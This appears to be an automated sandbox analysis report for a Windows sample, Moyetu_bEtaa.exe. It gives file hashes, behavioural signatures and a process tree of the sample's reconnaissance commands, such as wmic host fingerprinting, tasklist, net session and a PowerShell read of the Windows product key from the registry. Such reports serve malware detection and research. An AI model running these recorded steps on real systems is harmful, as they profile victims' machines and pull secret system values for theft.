SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

MD5 184829119ec9dd27f2c97fb9f2accd4e
SHA1 aa6652caa5ae6fcf316998d5546ca081577bccd8
SHA256 c5e1e6ea9fc48569d26235066bac249be39b49f751fe8eec3c58581a0cdb3b73
SHA512 e7256b639444a20ea6b16aa3f0c023afc2ec6c2994f92c1eebc02d4c28f275dc7c714f7945da3da5a8e83dd53b8283c632b4a9e7af88da609bf72c052a4b09ee

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2cfd3dd20571cce21f09407b28b565fb
SHA1 07a7704986e963e9ba69f7109b7450deccd23eb2
SHA256 c9eb076f465aac3c93c61f34fb7cfef6677bacbab7e0611c1c41b80b7f057792
SHA512 bec2ec4d1562c45aaa276e1687786ccd494afefe93dfa330c600e2ad8ac6783ea7988c284df42c5c811afc5d73686484012584faf553e9777f4cb0b7ad436e7d

memory/9356-1054-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/9416-1111-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1110-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1121-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1120-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1119-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1118-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1117-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1116-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1115-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

memory/9416-1109-0x00000215A7E30000-0x00000215A7E31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 cc77a58c32d922d6740fbdf2850a7006
SHA1 19c0f1fd5401a743bda560198dacd358823b6ea7
SHA256 718674b0ff3bbaa0c3934e31f540a4b73b9cedae9d590742e559abaf6c252ad0
SHA512 6a6626ad944766514082666d38a8364b5b72ee1a90b171c3460b856808a6234cd0611559c2d9cb112a8b2a4f5075f39687c606b7ebbfb79529a0f1784ecd0a88

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-20 08:46

Reported

2023-12-20 08:51

Platform

win7-20231129-en

Max time kernel

6s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1072 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 1072 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 1072 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 1072 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\System32\Wbem\wmic.exe
PID 2336 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\System32\Wbem\wmic.exe
PID 2336 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\System32\Wbem\wmic.exe
PID 2336 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 892 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 892 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 2336 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2876 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2876 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Windows\System32\Wbem\wmic.exe

wmic os get locale

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=992 --field-trial-handle=1148,13529124999043298060,13561505101400657904,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1072 get ExecutablePath

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1072 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1604 --field-trial-handle=1148,13529124999043298060,13561505101400657904,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

